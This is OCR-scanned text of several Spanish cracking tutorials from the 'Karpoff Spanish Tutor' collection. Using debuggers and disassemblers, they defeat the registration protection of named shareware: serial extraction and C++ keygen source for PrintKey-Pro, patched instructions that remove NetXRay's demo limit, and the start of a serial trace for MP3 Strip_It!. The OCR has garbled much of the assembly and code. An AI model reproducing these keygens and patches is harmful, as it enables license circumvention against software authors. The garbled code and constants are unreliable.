:00423E04 8B3D30864600 mov edi, dword ptr [00468630] 
:00423E0A 8D4C2408 lea ecx, dword ptr [esp+08] 
:00423E0E 50 push eax 

:00423E0F 51 push ecx 

:00423E10 FFD7 call edi 

:00423E12 8B96F0050000 mov edx, dword ptr [esi+-000005FO] 
:00423E18 8D442438 lea eax, dword ptr [esp+38] 
:00423E1C 52 push edx 

:00423E1D 50 push eax 

:00423E1E FFD7 call edi 

:00423E20 83C410 add esp, 00000010 

:00423E23 8BCE mov ecx, esi 

:00423E25 6A40 push 00000040 


* Possible StringData Ref from Data Obj ->"Register" 
| 
:00423E27 68EC134800 push 004813EC 


* Possible StringData Ref from Data Obj ->"Thanks for your registering.Please " 
->"restart the program to verify " 
->"the registration code." 


| 

:00423E2C 689C1F4800 push 00481F9C <= Caemos aqui 
:00423E31 E8F5270200 call 0044662B 

:00423E36 8B8EF4050000 mov ecx, dword ptr [esi+000005F4] 

* Reference To: KERNEL32.WritePrivateProfileStringA, Ord: 02E5h 


| 
:00423E3C 8B3D60824600 mov edi, dword ptr [00468260] 


* Possible StringData Ref from Data Obj ->"Mgreg.ini" <= Aqui se guarda el serial 


| 
:00423E42 680CF14700 push 0047F10C 
:00423E47 51 push ecx 


Al ir a la dirección 00423DE3 encontramos este código (NOTA: punto de ruptura en 00423DD9), vamos a 
ir a ver que hay en 00433227 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00423DB3(C) 


| 

:00423DCD 8B86F0050000 mov eax, dword ptr [esi+000005F0] 
:00423DD3 68E04D4800 push 00484DE0 

:00423DD8 50 push eax 

:00423DD9 E849F40000 call 00433227 <= Se genera el serial... 
:00423DDE 83C408 add esp, 00000008 

:00423DE1 85CO0 test eax, eax 

:00423DE3 7518 ¡ne 00423DFD <= Aqui da el Thank you... 
:00423DE5 6A10 push 00000010 


Bueno hemos llegado aquí y EAX trae el serial y EDX el nombre 


:00433227 55 push ebp 
:00433228 8BEC mov ebp, esp 


:0043322A 833DFC84480000 cmp dword ptr [004884FC], 00000000 
:00433231 53 push ebx 

:00433232 56 push esi 

:00433233 57 push edi 

:00433234 7512 jne 00433248 

:00433236 FF750C push [ebp+0C] 

:00433239 FF7508 push [ebp+08] 

:0043323C E8AF400000 call 004372F0 <= Aqui entramos 
:00433241 59 pop ecx 

:00433242 59 pop ecx 

:00433243 E989000000 ¡mp 004332D1 <= A este salto volveremos 


Hemos ido al salto 


:004372F0 8B542404 mov edx, dword ptr [esp+04] <= EDX recibe el serial 
:004372F4 8B4C2408 mov ecx, dword ptr [esp+08] <= ECX recibe un valor 0 
:004372F8 F7C203000000 test edx, 00000003 

:004372FE 753€ ¡ne 0043733C 


:00437300 8B02 mov eax, dword ptr [edx] <= Extrae el primer caracter del serial 
:00437302 3A01 cmp al, byte ptr [ecx] <= Compara el valor de EAX con el de ECX 
:00437304 752E ¡ne 00437334 <= Como no son iguales vamos a 00437334 
:00437306 OACO or al, al 

:00437308 7426 je 00437330 


Ya hemos ido y... 


:00437334 1BC0 sbb eax, eax <= Aqui caemos... 
:00437336 D1EO shl eax, 1 

:00437338 40 inc eax 

:00437339 C3 ret <= Regresamos 


Hemos vuelto a la rutina anterior 


:00433239 FF7508 push [ebp+08] 

:0043323C E8AF400000 call 004372F0 <= Aqui entramos 
:00433241 59 pop ecx <= Aqui regresamos 

:00433242 59 pop ecx 

:00433243 E989000000 j¡mp 004332D1 <= Vamos a este salto 


Luego de entrar en el salto hayamos esto... 


:004332D1 5F pop edi <= A aqui saltamos... 

:004332D2 5E pop esi 

:004332D3 5B pop ebx 

:004332D4 5D pop ebp 

:004332D5 C3 ret <= Regresamos y nos da el Thanks for your... 


Esto no está haciendo nada bueno... nos vamos a ver en toda la entrada al programa, cargamos el programa 
nuevamente y empezamos a tracear desde el OEP y vemos que el programa llega hasta aqui (si tienes duda 
en esto consulta mi tuto sobre WebScope v3.8a) 


:00433CCE 56 push esi 

:00433CCF 56 push esi 

:00433CD0 FF1568834600 Call dword ptr [00468368] => KERNEL32.GetModuleHandleA 
:00433CD6 50 push eax 

:00433CD7 E86BDB0000 call 00441847 <= Entramos aquí... 


Nos encontramos con esto otro... 


:00441847 FF742410 push [esp+10] 

:0044184B FF742410 push [esp+10] 

:0044184F FF742410 push [esp+10] 

:00441853 FF742410 push [esp+10] 

:00441857 E8FOAO00O0O call 0044B94C <= Entramos... 
:0044185C C21000 ret 0010 


Vemos un montón de código, con llamadas y saltos, pero hasta en 0041C76C encontramos algo 
interesante y no es sino hasta entre 0041D136 hasta 0041D179 en donde se genera el serial correcto... 
entonces cuando lleguemos al punto siguiente es que... 


:0041D177 40 inc eax 

:0041D178 49 dec ecx 

:0041D179 75BB jne 0041D136 

:0041D17B 8BB42494000000 mov esi, dword ptr [esp+00000094] <= Obtendremos nuestro serial 
válido... 


Ahora ya tenemos el serial correcto y vamos a ingresarlo, y podremos usar el programa de manera más libre, 
aunque sin embargo quiero que recuerdes, lo de siempre... 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de 
manera educacional y tambien como diversión, si ha USTED, le gusta el producto por favor 
COMPRELO, algunas veces... los autores merecen su dinero ;o)" 


Saludos a mis buenos amigos Karpoff, Profesor_X, CaoS ReptantE (gracias por tus consejos y ayuda en la 
realización de este tuto) y a todos los crackers hispanohablantes. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRKOiespana.es 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 


Programa: PrintKey-Pro v1.02 


PROTECCION: Obtener el Serial y realizar el Keygen. 

Descripcion: Aplicación para Capturar pantallas. 

Dificultad: Novato, Facililla, Media, Difícil, ETC 

DOWNLOAD: http://www.warecentral.com 

Herramientas: File Inspector, DeDe 3.0, W32dasm, SoftICE. 

CRACKER: Saccopharynx FECHA: 21/11/2001 


INTRODUCCION 


Bueno: Hola a todos. Cómo están? Aquí les presento mi segundo tutorial. 
En realidad es el segundo que envío, pero tengo hechos algunos más, pero 
todavía no los he pasado a página web. A medida que lo haga los ire 
enviando. Aprovecho el tutorial para agradecer a Dek_Oin por responder a 
mis pedidos de ayuda. Marchando... 


AL ATAKE 


INTRO 


Debido a que para realizar mis tutoriales necesito una herramienta para capturar 
imagenes he bajado de internet PrintKey-Pro v1.02, la cual antes de ser mi 
herramienta de trabajo fue mi víctima, ya que es una versión trial de 30 días. 
Las imágenes de este tutorial fueron capturadas con él, incluso la de él mismo, 
Jajaja... 


PRESENTANDO A LA VICTIMA 


Como mencioné anteriormente este es un programita para Capturar pantallas, 
simple, amigable y que tiene varias opciones. Las pantallas se pueden guardar en 
varios formatos. Acompaña a este tutorial el Keygen del serial de la víctima, 
hecho en C++ (aun no tengo tiempo para aprender Win32_ASM, no tengo Delphi ni 
Visual C, y ni sueñen que haga un Keygen en Vifual Bafic; después de haber 
trabajado con él realmente lo detesto, porque todo muy lindo para el usuario del 
sistema hecho en VB, pero para los programadores... un dolor de huevo). 


MANOS A LA OBRA 


Una vez instalada la victima ejecutamos la misma, vamos a Help->Register y 


cargamos los datos: 


Name: SACCOPHARYNX 
Key: 1234567 


Damos click sobre el botón Register y veremos un mensaje como este: 


Invalid key Please reenter ! 


Como no nos registramos ejecutamos File Inspector, abrimos el archivo 
PrintKeyPro.exe, analizamos el mismo, vamos a la solapa Compilador y vemos que 
fue hecho en Borland Delphi 3.0. Hmmm!!! Mi poca experiencia me dice que W32Dasm 
no nos servirá en un principio, ya que tiene problemas con las String 
References. La mejor opción es usar DeDe. La versión de DeDe 2.5 no funcionó con 
este programita, a si que busqué en www.balbaro.com y bajé la versión 3.0, con 
la cual descompilé a la víctima sin problemas. 


Podemos debuggear directamente con SoftICE, pero para no estar debuggeando a lo 
loco cada instrucción a partir del breakpoint en hmemcpy, nos conviene ir 
cercando al código de la víctima usando DeDe seguido de W32Dasm. Ahora 
ejecutamos DeDe 3.0, cargamos la víctima (PrintKeyPro.exe) y damos click en el 
botón Process. Una vez descompilada, vamos a la solapa Procedures. Si nos 
fijamos en la columna de Unit Name, nos interesa "Unit12 TRegisterForml" ya que 
es el Form de registro. 


7 DeDe v3.0b [c] 1999-2001 by DaFixer 


C:Márchivos de programa'Printkey-Pro*Printk 


lOPreviews TilOPreviews 
Previews TiPreviews 
Unit TTrayForml 
Unit10 ThMailForml 
Unit11 TRectForml 
TRegisterForml 
TFullRectFormi 
TáboutForml 
TObjectForml 
TMainForml 
TEditForml 


BitBtn2Click 
BitBtrvl Click 
FormCreate 
BitBtn2Click 
PROC”OD4F38DA 
PROC-OD4F3EDC 
“PROC-OD4F38E4 
a “PROC-ODAF3854 
: PROC-0D4F2B50 
TPiniFomi PROC-O04F3BE7 
TTextForml , . 
Lletconl PROC-OD4F3BED 
3d “PRAPAMAFIRER 


En la ventana de la derecha hacemos click con el botón derecho del mouse sobre 
BitBtn1Click, elejimos la opción Show additional data y veremos que se trata del 
botón de Registro: 


Entonces nuevamente, click con el botón derecho del mouse sobre BitBtnl1Click, 
pero ahora elejimos Disassemble. Se nos abrirá un ventana con el código que se 
ejecuta al hacer click sobre el botón Register. Lo que nos interesa saber es la 
línea en donde se hace referencia al String Reference Invalid key Please reenter 
l. Por lo tanto en la ventana que se nos abrió vamos a Edit->Find Text y 
buscamos la palabra Key para llegar hasta aquí: 


004F372E ESEDSCF1FF call DO040C420 


| 
DO4F3733 B208394F00 mov eax, $004F3908 


Como se puede observar se hace referencia a este string en la posición 004F3733. 
Dato muy importante, porque ahora analizaremos el código de la víctima más 
detalladamente a partir de esta posición, pero con W32Dasm. 


Ejecutamos W32Dasm, cargamos la víctima y vamos hasta dicha posición 
(Shift+F12). Si observamos detenidamente el siguiente código existen dos 
posibilidades de llegar hasta el mensaje de error: 


1) El salto condicional de la posición 004F36F3. Este salto se realiza si en el 
call de la posición 004F36EA se detecta que el serial no contiene caracteres 
numéricos. Para comprobar esto poner un breakpoint en 004F36EA y entrar con F8. 


2) Que el serial contenga solo caracteres numéricos, pero no sea el correcto. En 
este Caso no se ejecutará el salto de la posición 004F372C, dejándonos llegar 
justo al mensaje de error. El salto de esta posición solo se ejecuta si el 
resultado de la comparación anterior: 


:004F372A 3BFO cmp esi, eax 


es verdadero. Por lo tanto en esi o eax está el serial correcto. No voy a 
explicar como debuggear en SoftICE; existen muchos tutoriales, al respecto. Lo 
que se debe hacer para comprobar donde está el serial correcto es poner un 
breakpoint. Aquí hay dos posibilidades: 


A) Si no les interesa el Keygen ponen uno en 004F372A (bpx 004F372A). Cuando 
lleguen aquí y estén dentro de SoftICE ejecuten: 


? esi (Verán el serial falso: 1234567) 
? eax (Verán el serial verdadero: 93657585) 


B) Si les interesa el Keygen recomiendo poner un breakpoint en 004F3725, ya que 
aquí está el call que genera el serial. Cuando se detenga la ejecución aquí, 
entrar con F8. 


Ahora que ya tenemos el serial correcto cargamos nuestros datos nuevamente: 


Name: SACCOPHARYNX 
Key: 93657585 


Damos click en Register, cerramos y abrimos nuevamente la víctima, vamos a 
About, y: 


(c)1999-2000 by Warecentral 


Legales: 


GIF is a trademark of CompuServe, an HéR Block company. 
L24w licenced under U.S. patent 4,558,302 and foreign counterparts. 


Ya tenemos registrada a la víctima. A los que les interesa el Keygen los invito 
a la sección que sigue y a los que no también que no viene nada mal aprender 
más. 


KEYGEN 


Para analizar el Keygen supongo que siguieron las intrucciones del paso B. Sino, 
Qué esperan? Una vez que entraron con F8 debido al breakpoint en el call de la 
posición 004F3725, sigan traceando un poco con F10 hasta llegar aquí: 


|En estas pocas líneas está todo el código que genera el serial: 


:005040F2 -—-> Mueve nuestro Name a ecx. 

:005040F5 -> Mueve uno a uno, dependiendo del valor de edx, Cada Caracter 
de nuestro name. 

:005040FA -> Suma el código ASCIT del caracter en curso a ebx. 

:005040FC -> Incrementa edx. 

:005040FD -> Decrmenta eax. 

:005040FE -> Cuando eax valga 0 se han sumado todos los códigos ASCII de 
los caracteres de nuestro Name, menos el último. Si eax no 
es 0 se sigue con el siguiente caracter hasta el penúltimo 
inclusive. Una vez hecha la suma, el resultado de la misma 
se guarda en ebx. 

En el ejemplo de SACCOPHARYNX, esta será: 


ebx = 1179 (Decimal) 
ebx = 49D (Hexa) 


:00504100 -> Al resultado de la suma le agrega: 


12436 (Decimal) 
3094 (Hexa) 


Quedando el resultado en ebx. Para el caso 
de SACCOPHARYNX: 


1179 + 12436 
49B + 3094 


ebx 
ebx 


13615 (Decimal 
352F (Hexa) 


== 


:00504106 -> Se multiplica ebx por: 


6879 (Decimal) 
1ADF (Hexa) 


Almacenado el resultado en eax. Para el caso 
de SACCOPHARYNX: 


eax 
eax 


352F * 1ADF = 59519F1 (Hexa) 
13615 * 6879 = 93657585 (Decimal) 


Este último les parece conocido?; Siiiii, es el serial correcto. KeyGen listo. 
Aquí les dejo el código fuente del Keygen hecho en C++: 


// DESCRIPCION DEL ALGORITMO: 

// El serial solo se compone de caracteres numéricos. 

// Este se genera de la siguiente manera: 

1/ 

// A) Se realiza la suma de cada código ASCII de cada caracter de nuestro Name 
// menos del último. 

// Si Name contiene carcteres en mayúsculas, la suma 

// se realiza con los códigos ASCIIs del caracter correspondiente 

// en miníscula. Name debe contener por lo menos un 

// largo de tres caracteres. 


// 

// B) Al resultado de dicha suma se le agrega 12436. 
// 

// C) Al resultado de B se lo multiplica por 6879. 


tinclude <time.h> 


finclude <stdio.h> 
tinclude <conio.h> 
tinclude <string.h> 
tinclude <stdlib.h> 
ftinclude <iostream.h> 


long GeneraSerial (char *); 


void main (void) 

( 
char name[20]1; 
clrscr(); 
printf ("PrintKey-Pro v1.02 Keygenin"); 
printf ("by SACCOPHARYNX (21/11/2001) .An1n"); 
cout << "Name: "; 
cin >> name; 


if (strlen(name) < 3) 

cout << "Name debe tener al menos 3 caracteres de largo." << "Ann"; 
else 

cout << "Serial: " << GeneraSerial (name) << "Ann"; 


) 


long GeneraSerial (char * name) 


1 


int i; 

int largo = strlen (name); 
long suma_cod_ascii = 0; 
long serial = 0; 


// SUMA LOS CODIGOS ASCII DE LOS CARACTERES DE NAME 
for (i=0; i < largo-1; 1++) 
( 
if (name[il] >= 65 6€g£ name[i] <= 90) 
name[il] += 32; 


suma_cod_ascii += namel[i]; 


) 


// CALCULA EL SERIAL 
serial = (suma_cod_ascii + 12436) * 68709; 
return (serial); 


Para compilarlo yo utilicé Borlandc C++ 3.1. Si alguien lo quiere compilar 
cortar el código entre las líneas punteadas y copiarlo a un archivo, e]. 
pkp.cpp. Luego desde una consola de DOS ejecutar: 


bcc pkp.cpp 
y tendrán el ejecutable. Bueno espero que les haya gustado el tutorial. Me 


despido haste el próximo. Cualquier duda abajo tienen mi dirección de e-mail. 
Saludos a todos. 


Saccopharynx. saccopharynxftyahoo.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 


Programa: | NetxRay 3.0 (Demo) 


PROTECCION: 


Descripcion: Solo una de las tantas limitaciones 
Dificultad: Medio 


DOWNLOAD : 


Limitación de paquetes capturados a mostrar 


http://www.logixcomms.co.uk 


Herramientas: OllyDbg, spy++ 


CRACKER: Tamoxifeno FECHA: 27/01/2002 


INTRODUCCION | 


Buenas a todos, para que sea un gran debut me reservé una perlita para los que nos gustan las redes...nada 
mejor que disponer de un Sniffer sin limitaciónes para ver los paquetes capturados!!! . Puesto que no he 
podido encontrar quien lo haya hecho ( si alguien sabe donde encontrar el crack completo, que me ahorre el 
trabajo y me avise, gracias!!!), que mejor que hacerlo uno mismo asi que manos a la obra. Aclaro que utilizo 
el Ollydbg pués es increiblemente potente utilizando el entorno de Windows, y con un excelente manejo para: 
patchear el codigo, hacer dumps de toda la memoria utilizada por la aplicación, busquedas y cambios en la 


misma (limitación que encontré en el W32Dasm), analisis Heuristico del codigo, incorporar archivos ".lib" 
para reconocer funciones "inline" tipo "strlen" de C (usando el scan object file) y muchas más características 
potentísimas. ...en fin lo mejor que he encontrado. 


| AL ATAKE 


Como lo que el programa restringe es el número de items que se cargan en el Listbox de los paquetes que se capturaron, 
lo interesante sería primero ver si efectivamente no se cargan esos paquetes porque no se levantan de la red (lo cual sería 
un problema) o simplemente se levantan todos los que circulan por la red pero solo se limita el número de ellos que se 
muestran.Poniendome en el lugar del programador que realizó esta limitación, sería muy incómodo tener que tocar el 
código de captura pués es el código fundamental del programa, y sería más sencillo capturar todo y sólo mostrar unas 
pocas (5) de estas tramas!!! 

Un inconveniente que no he solucionado aún en programas que utilicen las MFC es el tema de los ordinales, por lo cual 
(al menos por ahora) utilizo el archivo "mfc42.def" para encontrar el nombre de la función correspondiente al ordinal 
que busco (si alguien sabe alguna forma más comoda solo avise!). 

Comento al menos para mi es un poco más complicado trabajar con programas que utilicen las MEC por todo lo que las 
mismas clases mantienen oculto, aunque teniendo los fuentes de las MFC que vienen con el VStudio es más sencillo. 

Lo primero es entonces ver donde se crea la ventana que mostrará las capturas (así como también hubiese estado bien 
ver donde se le indica al ListBox que agrege un item con SendMessage y LB_ADDSTRINO), para ello primero 
debemos saber que ventana es la que se crea , para lo cual podermos poner un breakpoint en Create WindowEx dentro 
del modulo mfc42.dll y a la vez investigar con el spy++ el tipo de clase a la que pertenece la ventana nueva y sus 
controles. Luego de encontrar inspeccionar vemos que la clase de la ventana nueva es "Afx:400000:b:1456:6:4f07", y la 
que contiene el ListBox es una SubClasificación de la está última que que se llama "NetXVList" , por lo que buscamos 
donde se crea esta ventana...y encontramos 


004844CF . PUSH O 

004844D1 . PUSH NETXRAY.0059D3B4 ; ASCII "NetXVList" 
004844D6 . MOV ECX, EBX 

004844D8 . CALL <JMP.8:MFC42.+2124> 

004844DD .MOV EBP, DWORD PTR SS:[ESP+10] 


donde MFC42.+t2124 es el ordinal de la función mfc "CWnd::Create” como se ve en el .def que además pone unos 
cuantos caracteres raros: "?CreateoCWndO CUAEHPBDOKABUtagRECTO EOPAV1OIPAUCCreateContextO EZ 2124 
NONAME" 


Ok, un gran avance, pero lo importante está por venir...seguimos analizando y vemos como crea el resto de los controles 
en esa ventana, llama distintas APIs y algunas mfc hasta que se llega a : 


004846D2 .>LEA ECX, DWORD PTR DS:[ESI+48] 

004846D5 .>CALL <JMP.8:MFC42.16242> ; SubClassWindow-CWnd 
004846DA >>MOV ECX, DWORD PTR DS:[ESI+A8] 

004846E0 .»PUSH 1 ; /Erase = TRUE 

004846E2 .»PUSH 0 ; |pRect = NULL 

004846E4 .»PUSH ECX ; |hWnd 

004846E5 ..¿ CALL NEAR DWORD PTR DS:[<8£USER32.InvalidateRect>] ; WinvalidateRect 
004846EB .»PUSH 5 

004846ED .»MOV ECX, EDI 

004846EF .>CALL <JMP.£MFC42.6215> ; ShowWindow 

004846F4 .»-MOV ECX, EBP 

004846F6 .>CALL 00463260 : <========== AQUI ESTA! 
004846FB .>LEA EDI, DWORD PTR DS:[ESI+178] 

00484701 .?»MOV EBX, EAX 

00484703 .?»MOV ECX, EDI 

00484705 .»MOV DWORD PTR SS:[ESP+14], EBX 

00484709 .>-CALL 004C0B80 

0048470E .»MOV EDX, DWORD PTR DS:[ESI+198] 

00484714 .>PUSH O ; /IlParam =0 

00484716 .»PUSH 0 ; |wParam = 0 

00484718 .»PUSH 602 ; [Message = MSG(602) 

0048471D .»PUSH EDX ; |hWnd 

0048471E ..¿CALL NEAR DWORD PTR DS:[<8USER32.SendMessageA>] ; ISendMessageA 
00484724 .-PUSH EBX 

00484725 .?»MOV ECX, EDI 

00484727 .,CALL 00482D30 ; Set ByteArray Size 


vemos que llama a una funcion con el "CALL 00463260", y vemos con que nos encontramos... 


00463260 MOV ECX, DWORD PTR DS:[ECX+58] 

00463263 TEST ECX, ECX 

00463265 JE SHORT 00463277 

00463267 CALL 00492C10 ; <= AQUI ESTA LA OTRA FUNCION!!! 
0046326CCMP EAX, 5 ; Mostrar más de 5 tramas? 

0046326F JLE SHORT 00463279 

00463271 MOV EAX,5  ;Si=> limita a 5 

00463276 RETN 

00463277 XOR EAX, EAX 

00463279 RETN 


donde se ve que llama a una función que retorna un valor en EAX donde el programa compara para ver si es mayor a 5, 
y en ese caso reemplaza EAX por 5 ...sospechoso... podría indicar que de aqui me limita el número de tramas a mostrar. 
Pero más evidente será si miramos la función que llama: 


00492C10 MOV EAX, DWORD PTR DS:[ECX+3C] ; Puntero a estructura? 

00492C13 MOV EAX, DWORD PTR DS:[EAX+10] ; EAX = *(p + Offset) (Nro de tramas a mostrar) 

00492C16 RETN 

Aqui se ve que el puntero que pone en EAX viene a ser algún tipo de estructura o clase que no he descubierto pero que 
indica lo siguiente: por un lado con un offset de +10 encuentra ahí el número de tramas a mostrar (nunca mayor a 5, 
osea que en algún otro lado hay otra limitación) y lo devuelve en EAX, pero también vemos que en un offset -18 está el 
número total de tramas levantadas!!!. Esto ultimo se ve haciendo un dump de la zona de memoria del puntero DWORD 
PTR DS:[ECX+3C], y sobre todo se encuentra que luego vienen las tramas que ha levantado (se puede reconocer 
fácilmente los ping en memoria), y para mejor, si por ejemplo estuve haciendo muchos ping_ seguidos y han sido 
capturados N tramas, vemos que en el dump aparecen las N tramas!!!! es decir que , como mi intuición de programador 
me indicaba, siempre captura todas las tramas pero muestra algunas. Llegado este punto las opciones son claras, por un 
lado tenemos la función que limita a 5 las tramas a mostrar , y por otro la que devuelve el número a de tramas 
disponibles que a su vez también está limitada (en alguna otra parte del código). 

Es hora de "patchear" el codigo... es muy interesante el encontrarnos con tantos nop's cercanos a la función pues 
permitirán utilizarlos para agregar algunas lineas de código. 

Primero quitamos esa comprobación respecto a 5, por lo que ponemos la función del siguiente modo: 


00463260 MOV ECX, DWORD PTR DS:[ECX+58] 
00463263 TEST ECX, ECX 
00463265 JE SHORT 0046326D 


00463267 CALL 00492C10 ; Llama a la función patcheada !!! 
0046326C RETN ; retorna que muestre todos los paquetes capturados 
0046326D XOR EAX, EAX 

0046326F RETN 


Luego modificamos la segunda función, para que cada vez que sea llamada copie de está estructura el valor del número 
de tramas capturadas donde está el valor del número de tramas a mostrar, y además devuelva este valor en EAX. De esta 
forma cada vez que se llame a esta función (se la llama por todos lados) nos aseguramos de mantener anulada la 
limitación. Para realizar esto necesitamos utilizar un registro (elijo el EST) 

por lo que recurro a los nop's existentes para agregar los push/ pop para este registro y el resto : 


00492C10 PUSH ESI ; Salvo ESI 

00492C11 MOV ESI, DWORD PTR DS:[ECX+3C] ; Puntero a Estructura !!! 

00492C14 MOV EAX, DWORD PTR DS:[EST-18] ; Offset a Tramas Capturadas (y queda en EAX) 
00492C17 MOV DWORD PTR DS:[ESI+10], EAX ; Copio a Offset Tramas a Mostrar 

00492C1A POP ESI  ; Restauro ESI 

00492C1B RETN ; quedó en EAX que muestré todas!!! 


Ahora no queda más que utilizar un editor hexa para cambiar las lineas de codigo por las nuevas que les acabo de 
mostrar y ya estará listo el nuevo ejecutable. Obviamente hay muchas cosas que no entraron en este tutorial pero que 
fueron haciendo que llegue a estás conclusiones (como dumps de memoria , y pruebas de distinto tipo como el buscar 
donde se agregan los items al ListBox, etc) 

Bueno, espero disfruten este magnifico Sniffer (al menos hasta que aparezca la restricción de los 30 días, pero esa será 
otra historia) 


Espero haber sido claro por ser la primera vez... 
Tamoxifenolfdata54.com 


Saludos: 
- A mi piojito hermoso 
- La gente de la 30 y del Fhelipe 


- Karpoff , nuMIT y los que colaboran en el crack, a quienes no conozco pero de quienes siempre se aprende. 
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PROTECCION: 
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DOWNLOAD: 
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CRACKER: 


Karpoff Spanish Tutor 1999-2002 


MP3 Strip_It! Digital v 5.2.2.11 


Número de Serie y limite de trabajo a 30 días 


Obtener un número de serie válido 


229772297? 


Newbie 


http://www.digitalcandle.com 


File Inspector , DeDe , Softl ce 
GZRIP FECHA: 01/02/2002 


INTRODUCCION 


Hola de nuevo , vanos a trabajar esta vez con un programa llamado MP3 Strip_It! Digital que permite extraer 
pistas de CD's de audio y pasarlas a formatos Wav o MP3 entre otros . 


AL ATAKE 


Como siempre utilizaremos el Filel nspector para ver de que se trata : 


gu file insPEctor XL a E 


ES Modificar | Me] Herramientas | Xé Plug-Ins | GA Procesos | 0 acerca de... | 
3 cabezera PE | [5] cabezera MZ | [+] Secciones | “$ Funciones (6% Compilador 


Compilador /Compresor/Protector 


Borland Inprise Delphi 4 


Signatura: < 55 8B EC 83 C4 F4 ES 60 34 53 00 ES 14 41 ED FF 33 
CO 55 68 DF 36 53 00 64 FF 30 64 89 20 8B 0D 84 74 53 CodeDaemon 
DO 86 09 B2 01 41 6C 51 52 00 > 
8 Info... 


PF Permitir análisis heurístico 


Versión del 50; 1.0 Versión de la imágen: fo. 
Versión del enlazador: [2.25 Versión del subsistema; fa. 


D [2 Abrir archivo + Lo Analizar Pl sali 
CAPruebaiMP3 Strip_ltl Digital Strip_it.exe 1,354 secs. 


Vemos que está hecho con Borland Delphi 4 .Vamos a la pestaña Secciones para saber si tiene algún tipo de 
protección anti - Desensamblado o anti - debugger 


$4 file insPE ctor XL a ES 


ES Modificar | Uf Herramientas | e Plug-Ins | <A Procesos | lO acerca de... | 
$ cabezera PE | 5] Cabezera MZ [4] Secciones |] :S Funciones | $9 Compilador | 


Name | Virtual Address | Virtual Size Phisic Address | Phisic Size | Characteristics 


4] coDE 00001000 00132018 00000400 00132E00 60000020 
CIDATA 00134000 00003D10 00133200 00DO3E00 C0000040 
Qess 00138000 00001375 00137000 00000000 CoO000000 
( .idata 00134000 00003358 00137000 00003400 C0000040 
( .tis 0013E000 00000014 00134400 00000000 CODODODO 
(7 .rdata 0D13FO0O 00000018 00134400 00000200 50000040 
(1 .reloc 00140000 00015130 00134600 00015200 50000040 
O .rsre 00156000 ODO7EE0O 0014F500 ODO 7EE0O 50000040 


[pe sections +] p Alinear sección 173 Volcar sección Dg Añadir Sección 


D [2 Abrir archivo + 7) Analizar e Salir 


Como veis no es así por lo tanto sólo nos queda arrancarlo para ver que deducciones sacamos antes de 
destripar : 


MP3 Strip_It! Suite - REGISTRATION 


Registration 


Thank you for pour interest in registering MP3 Strip_lt! Digital. 


Registration entitles you to free upgrades and allows you to legally 
run Strip_lt past it's 30 day limit. 


The registration fee is $25.00 US Dollars. 


To purchase MP3 Strip_ltl by check, money order or cash click the 
'By Mail' button. 


To purchase by credit card, open the following address with your 
web browser. 
http: ¿2ww alaciersoftware.comésite coi?page=see msd 


Once you have received your registration code via email. 
Enter the following information and click Register_ltl 


Full Name [c4sE sensitive Registration Code 
(AGZRIP hi 234567890 


By Mail | 


Bueno , lo de siempre , que si 30 días , que si lo podemos comprar por una serie de dólares etc... No perdamos 
riempo , introducimos los datos e intentamos registrarnos : 


(X) l'm sorry but pou have entered an invalid Registration Code. 


Your Name and Code are case-sensitive, meaning you MUST enter a captial where it should be capital letter and a 
lower-case letter where it should be a lower-case letter 


Ifyou are still having trouble please contact Tech Support at supportGMdigitalcandle.com. 


Nunca perderé la esperanza de introducir algún día un número y que me diga "Gracias por registrarte" , pero 
bueno esta vez vuelve a decir que no . 


Como siempre carguemos el programa con el Loader del Softl ce y pongamos los BPX que tengamos por 
costumbre , yo como siempre : GetWindowTextA , GetDlgltemTextA y MessageBoxA. Pero esta vez no salta 
con ninguno , por lo que me decanto por el de siempre : Hmemcpy . 

Damos F5 una vez, para saltar el nombre introducido y a continuación F12 tantas veces como sea necesario 
hasta que en la parte inferior de la pantalla de desensamblado aparezca algún tipo de referencia al programa 
con el que trabajamos , en este caso STRIP_IT!CODE+0002AAA6D que nos indica que ya estamos dentro de él. 
Una de las cosas más comunes cuando utilizamos Hmemcpy es que entremos en el programa con intrucciones 
de este tipo : 


cs:42BA72  POPESI  <----- Caemos aquí 
cs:42BA73 POP EBX 
cs:142BA74 — RET 


Comenzar a dar F10 para salir de todas estas instrucciones hasta llegar a una parte del programa que parezca 
que tiene más código, en este caso STRIP_I1T!CODE+0001239D8 : 


cs:5249DD MOV EDX,[EBP-01AC] Lorna Nuestro número 
cs:5249E3 POP EAX Gamma D EAX = número válido 
cs:5249E4 — CALL 4022A4 

Ccs:5249E9 ccoccoannanennnnnnnas 


Está bien claro que en todo lo que hemos hecho teóricamente no hemos entrado en ninguna llamada que 
generase la rutina de creación del número ( si cambiamos el nombre , cambia el número ) así que hemos 
llegado sólamente cuando estaba a punto de comprobarlo , probablemente en la CALL siguiente . 

Bien no es mi proposito el localizar esta vez dicha rutina y ver como genera dicho número ; pero si alguno está 
interesado no debe olvidar que al principio hemos detectado que estaba hecho en Borland Delphi y ¿ cual es el 
programa por excelencia para trabajar en este tipo de programas ? si señor el DeDe. 


Classes Info | Units Info | Forms || Procedures | Project | Esports | 


TFRegister 


about2 TFábout 
uE TFChoice | Events | Controls | 
config TFConfig 
DBLogDlg TLoginDialog : POR 
E abRegister_MailClick 00524740 
O iS obResister_ lECick 00524948 0019 
e a FormKeyDown 00524048 0012 
MMDesign MiDesetom Label OClick DOS24CBC 0013 
o rien TFRenster “PROC”D052475B 00524758 FFFF 
sopa T ESplash “PRODC”00524764 00524764 FFFF 
totd TFTotd “PRODC”00524772 00524772 FFFF 
“PROC”00524774 00524774 FFFF 
“PRDC”0052477C 0052477C FFFF 
“PROC”00524788 00524788 FFFF 
“PROC”0052479F 0052479F FFFF 


Si en gbRegister_ItClick apretaos botón derecho del ratón y picamos en Show additional data nos aparece : 


gbRegister_ltClick 


Event = OnClick 
Owner = gbRegister_tTBitBtn] 
Caption = 'Register_ltl' 


que nos indica que vamos por el buen camino ya que este es el botón que apretamos para validar el nombre y 
número introducidos .Solo nos queda picar en gbRegister_ItClick con el botón izquierdo del ratón y estaremos 
